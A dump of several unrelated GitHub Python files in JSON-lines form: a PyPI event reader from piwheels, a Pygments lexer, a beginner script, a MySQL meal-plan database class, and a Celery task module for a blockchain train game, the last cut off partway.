self._serial_timestamp >= finish_timestamp:\n # The serial we're seeking occurred within 5 minutes of the final\n # timestamp in the buffer; wait for more events\n return\n times = [event[2] for event in self._buffer]\n start = bisect_left(times, self._serial_timestamp)\n finish = bisect_left(times, finish_timestamp)\n # start is guaranteed to be at the same timestamp as serial, but\n # timestamps only have per-second resolution so there's likely to be\n # several serials with the same timestamp; wind start forward until we\n # find at least the serial as we're seeking (the serial we're seeking\n # isn't guaranteed to exist)\n while (\n self._buffer[start][2] == self._serial_timestamp and\n self._buffer[start][-1] < self._serial):\n start += 1\n assert self._buffer[start][2] == self._serial_timestamp\n assert start < finish\n for row in self._buffer[start:finish]:\n yield row\n self._serial_timestamp = self._buffer[finish][2]\n self._serial = self._buffer[finish][4]\n del self._buffer[:finish]\n\n\nclass PyPIEvents:\n \"\"\"\n When treated as an iterator, this class yields (package, version, timestamp,\n action) tuples indicating new packages or package versions registered on\n PyPI where action is one of 'create', 'source', 'remove', 'yank' or\n 'unyank'. 
A small attempt is made to avoid duplicate reports, but we don't\n    attempt to avoid reporting stuff already in the database (it's simpler to\n    just start from the beginning of PyPI's log and work through it).\n\n    The iterator only retrieves a small batch of entries at a time as PyPI\n    (very sensibly) limits the number of entries in a single query (to 50,000\n    at the time of writing), so the instance will need repeated querying to\n    retrieve all rows (this works in our favour though as it means there's an\n    obvious place to poll for control events between batches).\n\n    :param str pypi_xmlrpc:\n        The web address at which to find the PyPI XML-RPC server.\n\n    :param str pypi_json:\n        The web address at which to find PyPI's legacy JSON API.\n\n    :param int serial:\n        The serial number of the event from which to start reading.\n\n    :param int cache_size:\n        The size of the internal cache used to attempt to avoid duplicate\n        reports.\n    \"\"\"\n    # pylint: disable=too-few-public-methods\n    add_file_re = re.compile(r'^add ([^ ]+) file')\n    create_re = re.compile(r'^create$')\n    remove_re = re.compile(r'^remove(?: (?:project|release))?$')\n    yank_re = re.compile(r'^yank release$')\n    unyank_re = re.compile(r'^unyank release$')\n\n    def __init__(self, *, pypi_xmlrpc='https://pypi.org/pypi',\n                 pypi_json='https://pypi.org/pypi',\n                 serial=0, cache_size=1000):\n        self._buffer = PyPIBuffer(serial=serial, pypi_xmlrpc=pypi_xmlrpc)\n        self._next_read = datetime.now(tz=UTC)\n        # Keep a list of the last cache_size (package, version) tuples so we\n        # can make a vague attempt at reducing duplicate reports\n        self._versions = OrderedDict()\n        self._versions_size = cache_size\n        self._pypi_json = pypi_json\n\n    @property\n    def serial(self):\n        return self._buffer.serial\n\n    @serial.setter\n    def serial(self, value):\n        self._buffer.serial = value\n\n    def _get_description(self, package):\n        \"\"\"\n        Look up the project description for *package* using PyPI's legacy JSON\n        API.\n        \"\"\"\n        return pypi_package_description(package, pypi_url=self._pypi_json)\n\n    def _check_new_version(self, package, version, timestamp, action):\n        try:\n            self._versions.move_to_end((package, version))\n        except KeyError:\n            self._versions[(package, version)] = (timestamp, action)\n            yield (package, version, timestamp, action)\n        else:\n            # This (package, version) combo was already cached; unless it's\n            # a change from binary-only to source, don't bother emitting it\n            (last_timestamp, last_action) = self._versions[(package, version)]\n            if (last_action, action) == ('create', 'source'):\n                self._versions[(package, version)] = (last_timestamp, action)\n                yield (package, version, last_timestamp, action)\n        while len(self._versions) > self._versions_size:\n            self._versions.popitem(last=False)\n\n    def __iter__(self):\n        # The next_read flag is used to delay reads to PyPI once we get to the\n        # end of the event log entries\n        if datetime.now(tz=UTC) > self._next_read:\n            events = list(self._buffer)\n            if events:\n                for (package, version, timestamp, action, serial) in events:\n                    timestamp = datetime.fromtimestamp(timestamp, tz=UTC)\n                    match = self.add_file_re.search(action)\n                    if match is not None:\n                        action = (\n                            'source' if match.group(1) == 'source' else\n                            'create')\n                        for package, version, timestamp, action in \\\n                                self._check_new_version(\n                                    package, version, timestamp, action):\n                            description = self._get_description(package)\n                            yield (package, version, timestamp, action, description)\n                    elif self.create_re.search(action) is not None:\n                        description = self._get_description(package)\n                        yield (package, None, timestamp, 'create', description)\n                    elif self.remove_re.search(action) 
is not None:\n # If version is None here, indicating package deletion\n # we could search and remove all corresponding versions\n # from the cache but, frankly, it's not worth it\n if version is not None:\n self._versions.pop((package, version), None)\n yield (package, version, timestamp, 'remove', None)\n elif self.yank_re.search(action) is not None:\n yield (package, version, timestamp, 'yank', None)\n elif self.unyank_re.search(action) is not None:\n yield (package, version, timestamp, 'unyank', None)\n else:\n # If the read is empty we've reached the end of the event log\n # or an error has occurred; make sure we don't bother PyPI for\n # another 10 seconds\n self._next_read = datetime.now(tz=UTC) + timedelta(seconds=10)\n\n\n@lru_cache(maxsize=100)\ndef pypi_package_description(package, pypi_url='https://pypi.org/pypi'):\n \"\"\"\n Look up the project description for *package* using PyPI's legacy JSON\n API, rooted at *pypi_url*.\n \"\"\"\n pypi_url = urlsplit(pypi_url)\n path = PosixPath(pypi_url.path) / package / 'json'\n url = urlunsplit(pypi_url._replace(path=str(path)))\n try:\n resp = requests.get(url, timeout=10)\n resp.raise_for_status()\n except requests.Timeout:\n # SSL connection or read timed out; this isn't critical so just\n # return None and assume we'll pick it up later\n return None\n except requests.ConnectionError:\n # Failed to establish connection; usually \"Connection refused\"\n # which means we're hammering PyPI too much; give up for now and\n # assume we'll pick it up later\n return None\n except requests.exceptions.TooManyRedirects:\n # Too many redirects; again just return None as above\n return None\n except requests.HTTPError as exc:\n if exc.response.status_code >= 500:\n # Server side error; probably a temporary service failure.\n # Because the package description isn't critical just ignore it\n # and return None for now and assume we'll pick it up at a\n # later point\n return None\n elif exc.response.status_code == 404:\n # We may be requesting a description for a package that was\n # subsequently deleted; return None\n return None\n elif exc.response.status_code == 408:\n # Another timeout type; again just return None as above\n return None\n else:\n raise\n data = resp.json()\n try:\n description = data['info']['summary']\n except KeyError as exc:\n logger.error('%s missing when getting description for %s',\n exc, package)\n return None\n else:\n if description is None:\n return ''\n elif len(description) > 200:\n return description[:199] + '…'\n else:\n return description\n","repo_name":"piwheels/piwheels","sub_path":"piwheels/pypi.py","file_name":"pypi.py","file_ext":"py","file_size_in_byte":16755,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"52"} +{"seq_id":"7944800704","text":"from pygments.lexer import RegexLexer\nfrom pygments import token\nfrom pygments import style\nfrom sphinx.highlighting import lexers\n\n__version__ = '0.0.1'\n\n\nclass AlbaStyle(style.Style):\n default_style = \"\"\n styles = {\n token.Comment: 'italic #888',\n token.Keyword: 'bold #005',\n token.Name: '#f00',\n token.Name.Function: '#0f0',\n token.Name.Class: 'bold #0f0',\n token.String: 'bg:#eee #111'\n }\n\n\n\n\nclass AlbaLexer(RegexLexer):\n name = 'alba'\n aliases = ['Alba']\n filenames = ['*.al', '*.ali']\n mimetypes = ['text/x-alba']\n\n# token types:\n# Error, Whitespace, Number, String, Literal, Operator,\n# Comment, Punctuation, Name, Other, Keyword, Generic\n\n\n tokens = {\n 'root': [\n (r'\\s+', 
token.Text),\n (r'--.*', token.Comment.Singleline),\n (r'{\\|', token.Comment.Multiline, 'comment'),\n (r'\\b(all|and|And|Any|case|class|do|else|ghost|in|if|inspect|Level|let|module|mutual|not|Not|once|or|Or|Prop|record|ref|section|some|then|use|where)\\b',\n token.Keyword),\n (r'[a-zA-Z][a-zA-Z_0-9]*', token.Name),\n (r'[0-9]+', token.Number),\n (r'[+*/:=~\\\\-]',token.Operator),\n (r'.', token.Text)\n ],\n 'comment': [\n (r'{\\|', token.Comment.Multiline, '#push'),\n (r'[^|}]', token.Comment.Multiline),\n (r'\\|}', token.Comment.Multiline, '#pop'),\n (r'[|}]', token.Comment.Multiline)\n ]\n\n }\n\n\n\n\n#lexers['alba'] = AlbaLexer(startinline=True)\nlexers['alba'] = AlbaLexer()\n\n\n\n\n\ndef setup (app):\n return {'version' : '0.0.1'}\n","repo_name":"hbr/tex_alba_design","sub_path":"sphinx/source/alba_lexer.py","file_name":"alba_lexer.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5987346884","text":"import math\nimport random\n\n\ndef all_numbers(max):\n total = []\n for v in range(max):\n count = int(random.randrange(max))\n final = total.append(count)\n print(total)\n\n\nprint('Enter a number between 5 - 40')\nnumber = int(input())\n\nall_numbers(number)\n\n\n\n","repo_name":"phil-baller/learning-python","sub_path":"functions/learning_functions.py","file_name":"learning_functions.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3236775978","text":"import mysql.connector\n\nfrom schemas import Recipe, Ingredient, Step, MealPlan, MealPlanEntry\n\nMYSQL_DATABASE_URL = \"mysql+mysqlconnector://root:21304@127.0.0.1:3306/mealplan\"\n\n\n# connect to the database\nclass db:\n def __init__(self):\n self.conn = mysql.connector.connect(user='root',\n password='21304',\n host='127.0.0.1',\n database='mealplan')\n self.cursor = self.conn.cursor()\n # cursor.execute html escapes tuples, preventing sql injection\n\n # drop all tables\n def drop_all(self):\n # drop all tables\n self.cursor.execute(\"DROP TABLE IF EXISTS meal_plan_entries\")\n self.cursor.execute(\"DROP TABLE IF EXISTS meal_plans\")\n self.cursor.execute(\"DROP TABLE IF EXISTS saved_recipes\")\n self.cursor.execute(\"DROP TABLE IF EXISTS steps\")\n self.cursor.execute(\"DROP TABLE IF EXISTS ingredients\")\n self.cursor.execute(\"DROP TABLE IF EXISTS recipes\")\n self.cursor.execute(\"DROP TABLE IF EXISTS users\")\n self.conn.commit()\n\n # create user table\n def create_user_table(self):\n self.cursor.execute(\"CREATE TABLE users \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"username VARCHAR(255) NOT NULL UNIQUE, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"email VARCHAR(255) NOT NULL UNIQUE)\")\n self.conn.commit()\n\n # create recipe table\n def create_recipes_table(self):\n self.cursor.execute(\"CREATE TABLE recipes \"\n \"(id VARCHAR(12) PRIMARY KEY, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"description MEDIUMTEXT, \"\n \"image_src VARCHAR(255)) \")\n self.conn.commit()\n\n # ingredients table\n def create_ingredients_table(self):\n self.cursor.execute(\"CREATE TABLE ingredients \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"qty varchar(255), \"\n \"unit VARCHAR(255), \"\n \"recipe_id VARCHAR(12), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # steps table\n def create_steps_table(self):\n self.cursor.execute(\"CREATE TABLE steps \"\n \"(id 
INT AUTO_INCREMENT PRIMARY KEY, \"\n \"text MEDIUMTEXT, \"\n \"step_num INT, \"\n \"recipe_id VARCHAR(12), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # saved recipes table\n def create_saved_recipes_table(self):\n self.cursor.execute(\"CREATE TABLE saved_recipes \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"user_id INT, \"\n \"recipe_id VARCHAR(12), \"\n \"FOREIGN KEY (user_id) REFERENCES users(id), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # meal plans table\n def create_meal_plans_table(self):\n self.cursor.execute(\"CREATE TABLE meal_plans \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"name VARCHAR(255) NOT NULL, \"\n \"user_id INT, \"\n \"start_date DATE, \"\n \"end_date DATE, \"\n \"FOREIGN KEY (user_id) REFERENCES users(id))\")\n self.conn.commit()\n\n # create meal plan entries table\n def create_meal_plan_entry_table(self):\n self.cursor.execute(\"CREATE TABLE meal_plan_entries \"\n \"(id INT AUTO_INCREMENT PRIMARY KEY, \"\n \"mealplan_id INT, \"\n \"recipe_id VARCHAR(12), \"\n \"date DATE, \"\n \"meal VARCHAR(9), \" # breakfast, lunch, dinner, snack\n \"FOREIGN KEY (mealplan_id) REFERENCES meal_plans(id), \"\n \"FOREIGN KEY (recipe_id) REFERENCES recipes(id))\")\n self.conn.commit()\n\n # create a new user\n def create_user(self, name, username, email):\n self.cursor.execute(\"INSERT INTO users \"\n \"(name, username, email) \"\n \"VALUES (%s, %s, %s)\",\n (name, username, email))\n self.conn.commit()\n id = self.get_user_by_username(username)[0]\n return {\"user_id\": id}\n\n\n # get a user by username\n def get_user_by_username(self, username):\n self.cursor.execute(\"SELECT * FROM users WHERE username = %s\", (username,))\n user = self.cursor.fetchone()\n return user\n\n # get all users\n def get_all_users(self):\n self.cursor.execute(\"SELECT * FROM users\")\n users = self.cursor.fetchall()\n return users\n\n # create a new recipe\n def create_recipe(self, id, name, description, image_src):\n # check if recipe already exists\n self.cursor.execute(\"SELECT * FROM recipes WHERE id = %s\", (id,))\n recipe = self.cursor.fetchone()\n if recipe is None:\n self.cursor.execute(\"INSERT INTO recipes \"\n \"(id, name, description, image_src) \"\n \"VALUES (%s, %s, %s, %s)\", (id, name, description, image_src))\n self.conn.commit()\n return True\n else:\n return False\n\n # create recipe ingredients\n def create_ingredient(self, name, qty, unit, recipe_id):\n self.cursor.execute(\"INSERT INTO ingredients \"\n \"(name, qty, unit, recipe_id) \"\n \"VALUES (%s, %s, %s, %s)\", (name, qty, unit, recipe_id))\n self.conn.commit()\n\n def create_step(self, text, step_num, recipe_id):\n self.cursor.execute(\"INSERT INTO steps \"\n \"(text, step_num, recipe_id) \"\n \"VALUES (%s, %s, %s)\", (text, step_num, recipe_id))\n self.conn.commit()\n\n # get all recipes\n def get_many_recipes(self):\n self.cursor.execute(\"SELECT id FROM recipes\")\n recipe_list = self.cursor.fetchall()\n all_recipes = []\n for row_tuple in recipe_list:\n recipe = self.get_recipe_by_id(row_tuple[0])\n all_recipes.append(recipe)\n return all_recipes\n\n # get a recipe by id\n def get_recipe_by_id(self, id):\n self.cursor.execute(\"SELECT * FROM recipes WHERE id = %s\", (id,))\n recipe = self.cursor.fetchone()\n # create a recipe object\n if recipe is not None:\n # get ingredients\n self.cursor.execute(\"SELECT * FROM ingredients WHERE recipe_id = %s\", (id,))\n ingredients_tuple = self.cursor.fetchall()\n ingredients = []\n for 
ingredient in ingredients_tuple:\n ingredients.append(\n Ingredient(id=ingredient[0], name=ingredient[1], qty=ingredient[2], unit=ingredient[3]))\n # get steps\n self.cursor.execute(\"SELECT * FROM steps WHERE recipe_id = %s\", (id,))\n steps_tuple = self.cursor.fetchall()\n steps = []\n for step in steps_tuple:\n steps.append(Step(id=step[0], text=step[1], step_num=step[2]))\n # create the recipe object\n recipe = Recipe(id=id, name=recipe[1], description=recipe[2], image_src=recipe[3], ingredients=ingredients,\n steps=steps)\n return recipe\n else:\n return {\"message\": \"Recipe not found\"}\n\n # search for recipes\n def search_recipes(self, search_field, search_txt, limit):\n if search_field == \"name\":\n # TODO: refactor this to be able to search for multiple names\n self.cursor.execute(\"SELECT id FROM recipes WHERE name LIKE %s LIMIT %s\", (search_txt, limit))\n elif search_field == \"ingredients\":\n # TODO: refactor this to be able to search ingredients that are not exact matches\n ingredients = search_txt.split(\", \")\n # for each ingredient in the list, get the recipe ids and then inner join them\n query = \"SELECT recipe_id FROM ingredients WHERE name LIKE %s\"\n for i in range(1, ingredients.__len__()):\n query += \" INTERSECT SELECT recipe_id FROM ingredients WHERE name LIKE %s\"\n query += \" LIMIT %s\"\n # create a tuple of the ingredients and the limit\n ingredients.append(limit)\n query_tuple = tuple(ingredients)\n self.cursor.execute(query, query_tuple)\n else:\n return {\"message\": \"Invalid search field\"}\n # get the recipe ids using the queries previously made\n found_recipes = self.cursor.fetchall()\n # check if no recipes were found\n if found_recipes.__len__() == 0:\n return {\"message\": \"No recipes found\"}\n else:\n recipes = []\n for recipe in found_recipes:\n recipes.append(self.get_recipe_by_id(recipe[0]))\n return recipes\n\n # save a recipe for a user\n def save_recipe(self, user_id, mealplan_id):\n self.cursor.execute(\"INSERT INTO saved_recipes \"\n \"(user_id, recipe_id) \"\n \"VALUES (%s, %s)\", (user_id, mealplan_id))\n self.conn.commit()\n return {\"message\": \"Recipe saved\"}\n\n def add_to_meal_plan(self, recipe_id, meal, mealplan_id, date):\n self.cursor.execute(\"INSERT INTO meal_plan_entries \"\n \"(recipe_id, meal, mealplan_id, date) \"\n \"VALUES (%s, %s, %s, %s)\", (recipe_id, meal, mealplan_id, date))\n self.conn.commit()\n return {\"message\": \"Recipe added to meal plan\"}\n\n def create_new_meal_plan(self, name, start_date, end_date, user_id):\n self.cursor.execute(\"INSERT INTO meal_plans \"\n \"(name, start_date, end_date, user_id) \"\n \"VALUES (%s, %s, %s, %s)\", (name, start_date, end_date, user_id))\n self.conn.commit()\n return {\"message\": \"Meal plan created\"}\n\n def get_shopping_list(self, mealplan_id):\n self.cursor.execute(\"SELECT * FROM meal_plan_entries WHERE mealplan_id = %s\", (mealplan_id,))\n meal_plan_entries = self.cursor.fetchall()\n shopping_list = []\n for entry in meal_plan_entries:\n recipe = self.get_recipe_by_id(entry[2])\n for ingredient in recipe.ingredients:\n shopping_list.append(ingredient)\n return shopping_list\n\n def get_mealplans(self, user_id):\n self.cursor.execute(\"SELECT * FROM meal_plans WHERE user_id = %s\", (user_id,))\n mealplans = self.cursor.fetchall()\n\n # create a list of mealplan objects\n mealplan_list = []\n\n for mealplan in mealplans:\n id = mealplan[0]\n name = mealplan[1]\n start_date = str(mealplan[3])\n end_date = str(mealplan[4])\n user_id = mealplan[2]\n # get the 
meal plan entries\n self.cursor.execute(\"SELECT * FROM meal_plan_entries WHERE mealplan_id = %s\", (id,))\n meal_plan_entries = self.cursor.fetchall()\n\n # create a list of meal plan entry objects\n meal_plan_entry_list = []\n for entry in meal_plan_entries:\n entry_id = entry[0]\n mealplan_id = entry[1]\n recipe_id = entry[2]\n date = str(entry[3])\n meal = entry[4]\n meal_plan_entry_list.append(MealPlanEntry(id=entry_id, mealplan_id=mealplan_id, recipe_id=recipe_id, date=date, meal=meal))\n\n # create the meal plan object\n mealplan_list.append(MealPlan(id=id, name=name, start_date=start_date, end_date=end_date, user_id=user_id, entries=meal_plan_entry_list))\n return mealplan_list\n\n def copy_mealplan(self, mealplan_id):\n # get the meal plan\n self.cursor.execute(\"SELECT * FROM meal_plans WHERE id = %s\", (mealplan_id,))\n mealplan = self.cursor.fetchone()\n # create a new meal plan with the same name\n self.cursor.execute(\"INSERT INTO meal_plans \"\n \"(name, start_date, end_date, user_id) \"\n \"VALUES (%s, %s, %s, %s)\", (mealplan[1]+\"(copy)\", mealplan[3], mealplan[4], mealplan[2]))\n self.conn.commit()\n # get the new meal plan id\n self.cursor.execute(\"SELECT id FROM meal_plans WHERE name = %s\", (mealplan[1]+\"(copy)\",))\n new_mealplan_id = self.cursor.fetchone()[0]\n # get the meal plan entries\n self.cursor.execute(\"SELECT * FROM meal_plan_entries WHERE mealplan_id = %s\", (mealplan_id,))\n meal_plan_entries = self.cursor.fetchall()\n # copy the meal plan entries\n for entry in meal_plan_entries:\n self.cursor.execute(\"INSERT INTO meal_plan_entries \"\n \"(recipe_id, meal, mealplan_id, date) \"\n \"VALUES (%s, %s, %s, %s)\", (entry[2], entry[4], new_mealplan_id, entry[3]))\n self.conn.commit()\n return {\"message\": \"Meal plan copied\"}","repo_name":"bradenkh/fastApiProject","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":13585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7856089888","text":"from datetime import datetime\nfrom sqlmodel import Session, or_\nfrom celery import Celery\nfrom models import Logrun,Usefuel, Npcencounter,Car, Logtip, Tip, Template, Asset, Buyfuel\nfrom db import db_session, engine, commit_or_rollback\nimport cachetool,config, os, time, inspect\nfrom utils.nodes import AH, pick_best_waxnode\nfrom disclog import postLog\n\ncelery = Celery(__name__)\ncelery.conf.broker_url = os.environ.get(\"CELERY_BROKER_URL\", \"redis://localhost:6379\")\ncelery.conf.result_backend = os.environ.get(\"CELERY_RESULT_BACKEND\", \"redis://localhost:6379\")\n\nclass SqlAlchemyTask(celery.Task):\n abstract = True\n\n def after_return(self, status, retval, task_id, args, kwargs, einfo):\n db_session.remove()\n\n@celery.on_after_configure.connect\ndef setup_periodic_tasks(sender, **kwargs):\n sender.add_periodic_task(60.0, Atomic.s(), name='routine to keep assets+templates updated')\n\n\n@celery.task(base=SqlAlchemyTask)\ndef Atomic() -> str:\n start=time.perf_counter()\n try:\n scanTemplates()\n except Exception as e:\n postLog(e,\"error\",f\"{inspect.stack()[0][3]}:{inspect.stack()[0][2]}\")\n \n return f\"atomic routine done,took: {(time.perf_counter()-start)} \"\n\ndef fetchRoutine(mode,server):\n \n fetcher = getattr(AH(server=server), mode)\n after = cachetool.get_cache(f\"last_{mode}\")\n page = 1\n out = []\n running = True\n while running:\n try:\n jst = fetcher(page=page,after=after)\n for result in jst[\"data\"]:\n if 
result[\"schema\"][\"schema_name\"] in config.wanted_templates:\n out.append(result)\n\n if len(jst[\"data\"]) == 0:\n running=False\n else:\n try:\n cachetool.set_cache(f\"last_{mode}\",int(jst[\"data\"][-1][\"minted_at_time\"]))\n except Exception as e:\n cachetool.set_cache(f\"last_{mode}\",int(jst[\"data\"][-1][\"created_at_time\"]))\n\n page += 1\n time.sleep(0.7)\n except Exception as e:\n postLog(e,\"warn\",f\"{inspect.stack()[0][3]}:{inspect.stack()[0][2]}\")\n time.sleep(10)\n return out\n\ndef scanTemplates():\n server= pick_best_waxnode(\"atomic\",6)[0]\n templates = fetchRoutine(\"templates\",server)\n assets = fetchRoutine(\"assets\",server)\n \n writer.delay(templates,\"template\")\n if len(templates) > 100:\n time.sleep(5)\n writer.delay(assets,\"asset\")\n\n \nclass Builder():\n def create_new_action(self,act):\n\n blocktime = datetime.fromisoformat(act[\"block_time\"])\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"logrun\":\n\n with Session(engine) as session:\n full_cars = []\n for index,railcar in enumerate(act[\"action_trace\"][\"act\"][\"data\"][\"loads\"]):\n loads = session.query(Asset).filter(Asset.asset_id.in_(railcar[\"load_ids\"])).all() if railcar[\"load_ids\"] else None\n car = session.query(Asset).filter(Asset.asset_id==railcar[\"railcar_asset_id\"]).first() if railcar[\"railcar_asset_id\"] else None\n if car and loads:\n stm = Car(\n index=index,\n car=[car],\n loads=loads,\n type=loads[0].template.schema_name if loads else \"None\"\n )\n session.add(stm)\n full_cars.append(stm)\n else:\n print(act[\"action_trace\"][\"trx_id\"],railcar)\n \n try:\n session.commit()\n except Exception as e:\n print(e)\n session.rollback()\n\n qry = session.query(Usefuel).filter(Usefuel.trx_id==act[\"action_trace\"][\"act\"][\"data\"][\"last_run_tx\"]).first()\n tips = session.query(Logtip).filter(Logtip.trx_id==act[\"action_trace\"][\"trx_id\"]).all()\n npcs = session.query(Npcencounter).filter(Npcencounter.trx_id==act[\"action_trace\"][\"trx_id\"]).all()\n locos = session.query(Asset).filter(Asset.asset_id.in_(act[\"action_trace\"][\"act\"][\"data\"][\"locomotives\"])).all()\n cons = session.query(Asset).filter(Asset.asset_id.in_(act[\"action_trace\"][\"act\"][\"data\"][\"conductors\"])).all()\n\n\n if qry:\n fuel_type=qry.fuel_type\n quantity=qry.quantity\n else:\n print(f'trx not found: {act[\"action_trace\"][\"act\"][\"data\"][\"last_run_tx\"]}') \n fuel_type=\"COAL\"\n quantity=0\n \n hrhandle = blocktime.strftime(\"20%y-%m-%dT%H:00:00.000\")\n dayhandle = blocktime.strftime(\"20%y-%m-%dT00:00:00.000\")\n\n return Logrun(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n hour_handle = hrhandle,\n hour_handlestamp = int(datetime.fromisoformat(hrhandle).timestamp()),\n day_handle = dayhandle,\n day_handlestamp = int(datetime.fromisoformat(dayhandle).timestamp()),\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n railroader_reward = act[\"action_trace\"][\"act\"][\"data\"][\"railroader_reward\"],\n run_complete = act[\"action_trace\"][\"act\"][\"data\"][\"run_complete\"],\n run_start = act[\"action_trace\"][\"act\"][\"data\"][\"run_start\"],\n locomotives =locos,\n conductors = cons,\n cars=full_cars,\n logtips=tips,\n npcs=npcs,\n station_owner = act[\"action_trace\"][\"act\"][\"data\"][\"station_owner\"],\n station_owner_reward = act[\"action_trace\"][\"act\"][\"data\"][\"station_owner_reward\"],\n train_name = 
act[\"action_trace\"][\"act\"][\"data\"][\"train_name\"],\n weight = act[\"action_trace\"][\"act\"][\"data\"][\"weight\"],\n arrive_station = act[\"action_trace\"][\"act\"][\"data\"][\"arrive_station\"],\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n depart_station = act[\"action_trace\"][\"act\"][\"data\"][\"depart_station\"],\n distance = act[\"action_trace\"][\"act\"][\"data\"][\"distance\"],\n last_run_time = act[\"action_trace\"][\"act\"][\"data\"][\"last_run_time\"],\n last_run_tx = act[\"action_trace\"][\"act\"][\"data\"][\"last_run_tx\"],\n fuel_type=fuel_type,\n quantity=quantity\n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"usefuel\":\n return Usefuel(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n fuel_type = act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[1],\n quantity = float(act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[0]),\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n \n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"buyfuel\":\n return Buyfuel(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n fuel_type = act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[1],\n quantity = float(act[\"action_trace\"][\"act\"][\"data\"][\"quantity\"].split(\" \")[0]),\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n tocium_payed = float(act[\"action_trace\"][\"act\"][\"data\"][\"tocium\"].split(\" \")[0]),\n \n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"npcencounter\":\n return Npcencounter(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n npc = act[\"action_trace\"][\"act\"][\"data\"][\"npc\"],\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n reward = int(float(act[\"action_trace\"][\"act\"][\"data\"][\"reward\"].split(\" \")[0])*10000),\n reward_symbol = act[\"action_trace\"][\"act\"][\"data\"][\"reward\"].split(\" \")[1],\n train = act[\"action_trace\"][\"act\"][\"data\"][\"train\"],\n \n )\n\n if act[\"action_trace\"][\"act\"][\"name\"] == \"logtips\":\n return Logtip(\n trx_id= act[\"action_trace\"][\"trx_id\"],\n action_seq= act[\"account_action_seq\"],\n block_time= act[\"block_time\"],\n block_timestamp= int(blocktime.timestamp()),\n century = act[\"action_trace\"][\"act\"][\"data\"][\"century\"],\n railroader = act[\"action_trace\"][\"act\"][\"data\"][\"railroader\"],\n total_tips = int(act[\"action_trace\"][\"act\"][\"data\"][\"total_tips\"]),\n before_tips = int(act[\"action_trace\"][\"act\"][\"data\"][\"before_tips\"]),\n train = act[\"action_trace\"][\"act\"][\"data\"][\"train\"],\n tips= [ Tip(template_id = int(tipu[\"template_id\"]), criterion = tipu[\"criterion\"], amount = int(tipu[\"tip\"])) for tipu in act[\"action_trace\"][\"act\"][\"data\"][\"tips\"]],\n )\n\n def create_new_template(self,template):\n template_skeleton = Template(\n template_id=int(template[\"template_id\"]),\n schema_name = template[\"schema\"][\"schema_name\"],\n name=template[\"immutable_data\"][\"name\"],\n 
cardid=template[\"immutable_data\"][\"cardid\"],\n rarity=template[\"immutable_data\"][\"rarity\"],\n img=template[\"immutable_data\"][\"img\"] if (\"img\" in template[\"immutable_data\"].keys()) else \"\"\n )\n\n if template[\"schema\"][\"schema_name\"] == \"passengercar\":\n template_skeleton.weight = template[\"immutable_data\"][\"weight\"]\n template_skeleton.seats = template[\"immutable_data\"][\"seats\"]\n\n if template[\"schema\"][\"schema_name\"] == \"passenger\":\n template_skeleton.tip = template[\"immutable_data\"][\"tip\"]\n template_skeleton.desc = template[\"immutable_data\"][\"desc\"]\n template_skeleton.criterion = template[\"immutable_data\"][\"criterion\"]\n template_skeleton.threshold = template[\"immutable_data\"][\"threshold\"]\n template_skeleton.home_region = template[\"immutable_data\"][\"home_region\"]\n template_skeleton.home_regionid = template[\"immutable_data\"][\"home_regionid\"]\n \n if template[\"schema\"][\"schema_name\"] == \"locomotive\":\n template_skeleton.fuel = template[\"immutable_data\"][\"fuel\"]\n template_skeleton.speed = template[\"immutable_data\"][\"speed\"]\n template_skeleton.distance = template[\"immutable_data\"][\"distance\"]\n template_skeleton.composition = template[\"immutable_data\"][\"composition\"]\n template_skeleton.hauling_power = template[\"immutable_data\"][\"hauling_power\"] if (\"hauling_power\" in template[\"immutable_data\"].keys()) else None\n template_skeleton.conductor_threshold = template[\"immutable_data\"][\"conductor_threshold\"] \n\n if template[\"schema\"][\"schema_name\"] == \"conductor\":\n template_skeleton.perk = template[\"immutable_data\"][\"perk\"]\n template_skeleton.perk_boost = 